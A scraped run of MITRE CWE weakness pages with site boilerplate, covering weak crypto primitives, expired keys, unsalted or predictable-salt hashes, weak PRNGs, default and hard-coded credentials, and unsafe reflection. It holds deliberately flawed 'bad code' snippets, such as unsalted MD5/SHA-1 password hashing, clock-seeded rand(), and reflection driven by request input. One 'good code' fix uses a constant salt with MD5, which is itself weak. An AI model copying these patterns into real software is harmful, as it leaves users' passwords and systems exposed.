Example 3 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple OT products used weak cryptography. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
CWE-1240: Use of a Cryptographic Primitive with a Risky Implementation
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterTo fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.
Cryptographic protocols and systems depend on cryptographic primitives (and associated algorithms) as their basic building blocks. Some common examples of primitives are digital signatures, one-way hash functions, ciphers, and public key cryptography; however, the notion of "primitive" can vary depending on point of view. See "Terminology Notes" for further explanation of some concepts. Cryptographic primitives are defined to accomplish one very specific task in a precisely defined and mathematically reliable fashion. For example, suppose that for a specific cryptographic primitive (such as an encryption routine), the consensus is that the primitive can only be broken after trying out N different inputs (where the larger the value of N, the stronger the cryptography). For an encryption scheme like AES-256, one would expect N to be so large as to be infeasible to execute in a reasonable amount of time. If a vulnerability is ever found that shows that one can break a cryptographic primitive in significantly less than the expected number of attempts, then that primitive is considered weakened (or sometimes in extreme cases, colloquially it is "broken"). As a result, anything using this cryptographic primitive would now be considered insecure or risky. Thus, even breaking or weakening a seemingly small cryptographic primitive has the potential to render the whole system vulnerable, due to its reliance on the primitive. A historical example can be found in TLS when using DES. One would colloquially call DES the cryptographic primitive for transport encryption in this version of TLS. In the past, DES was considered strong, because no weaknesses were found in it; importantly, DES has a key length of 56 bits. Trying N=2^56 keys was considered impractical for most actors. Unfortunately, attacking a system with 56-bit keys is now practical via brute force, which makes defeating DES encryption practical. It is now practical for an adversary to read any information sent under this version of TLS and use this information to attack the system. As a result, it can be claimed that this use of TLS is weak, and that any system depending on TLS with DES could potentially render the entire system vulnerable to attack. Cryptographic primitives and associated algorithms are only considered safe after extensive research and review from experienced cryptographers from academia, industry, and government entities looking for any possible flaws. Furthermore, cryptographic primitives and associated algorithms are frequently reevaluated for safety when new mathematical and attack techniques are discovered. As a result and over time, even well-known cryptographic primitives can lose their compliance status with the discovery of novel attacks that might either defeat the algorithm or reduce its robustness significantly. If ad-hoc cryptographic primitives are implemented, it is almost certain that the implementation will be vulnerable to attacks that are well understood by cryptographers, resulting in the exposure of sensitive information and other consequences. This weakness is even more difficult to manage for hardware-implemented deployment of cryptographic algorithms. First, because hardware is not patchable as easily as software, any flaw discovered after release and production typically cannot be fixed without a recall of the product. Secondly, the hardware product is often expected to work for years, during which time computation power available to the attacker only increases. Therefore, for hardware implementations of cryptographic primitives, it is absolutely essential that only strong, proven cryptographic primitives are used. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Hardware Design" (View-1194)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Re-using random values may compromise security. (bad code)
Example Language: Other
Suppose an Encryption algorithm needs a random value for a key. Instead of using a DRNG (Deterministic Random Number Generator), the designer uses a linear-feedback shift register (LFSR) to generate the value.
While an LFSR may provide pseudo-random number generation service, the entropy (measure of randomness) of the resulting output may be less than that of an accepted DRNG (like that used in dev/urandom). Thus, using an LFSR weakens the strength of the cryptographic system, because it may be possible for an attacker to guess the LFSR output and subsequently the encryption key. (good code)
Example Language: Other
If a cryptographic algorithm expects a random number as its input, provide one. Do not provide a pseudo-random value.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Terminology Terminology for cryptography varies widely, from informal and colloquial to mathematically-defined, with different precision and formalism depending on whether the stakeholder is a developer, cryptologist, etc. Yet there is a need for CWE to be self-consistent while remaining understandable and acceptable to multiple audiences. As of CWE 4.6, CWE terminology around "primitives" and "algorithms" is emerging as shown by the following example, subject to future consultation and agreement within the CWE and cryptography communities. Suppose one wishes to send encrypted data using a CLI tool such as OpenSSL. One might choose to use AES with a 256-bit key and require tamper protection (GCM mode, for instance). For compatibility's sake, one might also choose the ciphertext to be formatted to the PKCS#5 standard. In this case, the "cryptographic system" would be AES-256-GCM with PKCS#5 formatting. The "cryptographic function" would be AES-256 in the GCM mode of operation, and the "algorithm" would be AES. Colloquially, one would say that AES (and sometimes AES-256) is the "cryptographic primitive," because it is the algorithm that realizes the concept of symmetric encryption (without modes of operation or other protocol related modifications). In practice, developers and architects typically refer to base cryptographic algorithms (AES, SHA, etc.) as cryptographic primitives. Maintenance
CWE-324: Use of a Key Past its Expiration Date
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.
While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged periods of time have a decreasing probability of integrity. For this reason, it is important to replace keys within a period of time proportional to their strength.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code attempts to verify that a certificate is valid. (bad code)
Example Language: C
if (cert = SSL_get_peer_certificate(ssl)) {
foo=SSL_get_verify_result(ssl);
if ((X509_V_OK==foo) || (X509_V_ERRCERT_NOT_YET_VALID==foo)) //do stuff The code checks if the certificate is not yet valid, but it fails to check if a certificate is past its expiration date, thus treating expired certificates as valid. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-760: Use of a One-Way Hash with a Predictable Salt
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product uses a predictable salt as part of the input.
This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables, effectively disabling the protection that an unpredictable salt would provide. It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-759: Use of a One-Way Hash without a Salt
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product does not also use a salt as part of the input.
This makes it easier for attackers to pre-compute the hash value using dictionary attack techniques such as rainbow tables. It should be noted that, despite common perceptions, the use of a good salt with a hash does not sufficiently increase the effort for an attacker who is targeting an individual password, or who has a large amount of computing resources available, such as with cloud-based services or specialized, inexpensive hardware. Offline password cracking can still be effective if the hash function is not expensive to compute; many cryptographic functions are designed to be efficient and can be vulnerable to attacks using massive computing resources, even if the hash is cryptographically strong. The use of a salt only slightly increases the computing requirements for an attacker compared to other strategies such as adaptive hash functions. See CWE-916 for more details. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In both of these examples, a user is logged in if their given password matches a stored password: (bad code)
Example Language: C
unsigned char *check_passwd(char *plaintext) {
ctext = simple_digest("sha1",plaintext,strlen(plaintext), ... ); }//Login if hash matches stored hash if (equal(ctext, secret_password())) { login_user(); }(bad code)
Example Language: Java
String plainText = new String(plainTextIn);
MessageDigest encer = MessageDigest.getInstance("SHA"); encer.update(plainTextIn); byte[] digest = password.digest(); //Login if hash matches stored hash if (equal(digest,secret_password())) { login_user(); }This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user's password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328). It also does not use a salt (CWE-759). Example 2 In this example, a new user provides a new username and password to create an account. The program hashes the new user's password then stores it in a database. (bad code)
Example Language: Python
def storePassword(userName,Password):
hasher = hashlib.new('md5')
hasher.update(Password) hashedPassword = hasher.digest() # UpdateUserLogin returns True on success, False otherwise return updateUserLogin(userName,hashedPassword) While it is good to avoid storing a cleartext password, the program does not provide a salt to the hashing function, thus increasing the chances of an attacker being able to reverse the hash and discover the original password if the database is compromised. Fixing this is as simple as providing a salt to the hashing function on initialization: (good code)
Example Language: Python
def storePassword(userName,Password):
hasher = hashlib.new('md5',b'SaltGoesHere')
hasher.update(Password) hashedPassword = hasher.digest() # UpdateUserLogin returns True on success, False otherwise return updateUserLogin(userName,hashedPassword) Note that regardless of the usage of a salt, the md5 hash is no longer considered secure, so this example still exhibits CWE-327. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a Pseudo-Random Number Generator (PRNG) in a security context, but the PRNG's algorithm is not cryptographically strong.
When a non-cryptographic PRNG is used in a cryptographic context, it can expose the cryptography to certain types of attacks. Often a pseudo-random number generator (PRNG) is not designed for cryptography. Sometimes a mediocre source of randomness is sufficient or preferable for algorithms that use random numbers. Weak generators generally take less processing power and/or do not use the precious, finite, entropy sources on a system. While such PRNGs might have very useful features, these same features could be used to break the cryptography. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Both of these examples use a statistical PRNG seeded with the current value of the system clock to generate a random number: (bad code)
Example Language: Java
Random random = new Random(System.currentTimeMillis());
int accountID = random.nextInt(); (bad code)
Example Language: C
srand(time());
int randNum = rand(); The random number functions used in these examples, rand() and Random.nextInt(), are not considered cryptographically strong. An attacker may be able to predict the random numbers generated by these functions. Note that these example also exhibit CWE-337 (Predictable Seed in PRNG). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-1392: Use of Default Credentials
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses default credentials (such as passwords or cryptographic keys) for potentially critical functionality.
It is common practice for products to be designed to use
default keys, passwords, or other mechanisms for
authentication. The rationale is to simplify the
manufacturing process or the system administrator's task of
installation and deployment into an enterprise. However, if
admins do not change the defaults, it is easier for attackers
to bypass authentication quickly across multiple
organizations.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. At least one OT product used default credentials. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-1393: Use of Default Password
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
It is common practice for products to be designed to use
default passwords for authentication. The rationale is to
simplify the manufacturing process or the system
administrator's task of installation and deployment into an
enterprise. However, if admins do not change the defaults,
then it makes it easier for attackers to quickly bypass
authentication across multiple organizations. There are many
lists of default passwords and default-password scanning tools
that are easily available from the World Wide Web.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. Multiple OT products used default credentials. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.
If the product uses external inputs to determine which class to instantiate or which method to invoke, then an attacker could supply values to select unexpected classes or methods. If this occurs, then the attacker could create control flow paths that were not intended by the developer. These paths could bypass authentication or access control checks, or otherwise cause the product to behave in an unexpected manner. This situation becomes a doomsday scenario if the attacker can upload files into a location that appears on the product's classpath (CWE-427) or add new entries to the product's classpath (CWE-426). Under either of these conditions, the attacker can use reflection to introduce new, malicious behavior into the product.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Seven Pernicious Kingdoms" (View-700)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 A common reason that programmers use the reflection API is to implement their own command dispatcher. The following example shows a command dispatcher that does not use reflection: (good code)
Example Language: Java
String ctl = request.getParameter("ctl");
Worker ao = null; if (ctl.equals("Add")) {
ao = new AddCommand();
}else if (ctl.equals("Modify")) {
ao = new ModifyCommand();
}else {
throw new UnknownActionError();
}
ao.doAction(request); A programmer might refactor this code to use reflection as follows: (bad code)
Example Language: Java
String ctl = request.getParameter("ctl");
Class cmdClass = Class.forName(ctl + "Command"); Worker ao = (Worker) cmdClass.newInstance(); ao.doAction(request);
The refactoring initially appears to offer a number of advantages. There are fewer lines of code, the if/else blocks have been entirely eliminated, and it is now possible to add new command types without modifying the command dispatcher. However, the refactoring allows an attacker to instantiate any object that implements the Worker interface. If the command dispatcher is still responsible for access control, then whenever programmers create a new class that implements the Worker interface, they must remember to modify the dispatcher's access control code. If they do not modify the access control code, then some Worker classes will not have any access control. One way to address this access control problem is to make the Worker object responsible for performing the access control check. An example of the re-refactored code follows: (bad code)
Example Language: Java
String ctl = request.getParameter("ctl");
Class cmdClass = Class.forName(ctl + "Command"); Worker ao = (Worker) cmdClass.newInstance(); ao.checkAccessControl(request); ao.doAction(request); Although this is an improvement, it encourages a decentralized approach to access control, which makes it easier for programmers to make access control mistakes. This code also highlights another security problem with using reflection to build a command dispatcher. An attacker can invoke the default constructor for any kind of object. In fact, the attacker is not even constrained to objects that implement the Worker interface; the default constructor for any object in the system can be invoked. If the object does not implement the Worker interface, a ClassCastException will be thrown before the assignment to ao, but if the constructor performs operations that work in the attacker's favor, the damage will already have been done. Although this scenario is relatively benign in simple products, in larger products where complexity grows exponentially, it is not unreasonable that an attacker could find a constructor to leverage as part of an attack. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-598: Use of GET Request Method With Sensitive Query Strings
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-798: Use of Hard-coded Credentials
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThere are two main variations:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
